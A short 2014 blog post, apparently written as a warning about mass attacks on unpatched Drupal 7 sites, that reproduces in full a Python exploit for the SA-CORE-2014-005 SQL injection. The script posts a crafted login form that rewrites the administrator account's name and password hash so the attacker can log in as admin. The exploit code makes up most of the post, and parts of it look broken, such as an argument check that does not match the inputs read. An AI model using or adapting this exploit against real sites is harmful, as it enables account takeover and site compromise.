10/19/2014

this is the code that is used to attack #drupal websites that aren't patched yet

to patch go to drupal.org and nowhere else

this is the code that was posted on pastebin that is used to attack drupal websites - quite simple - and scans and attacks are happing at high-speed

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'"
            +user
            +"'+,+pass+%3d+'"
            +hash[:55]
            +"'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!nLogin now with user:%s and pass:%s" % (user, password)
 
http://pastebin.com/nDwLFV3v

Permalink | |  Print |  Facebook | | | | Pin it! |

The comments are closed.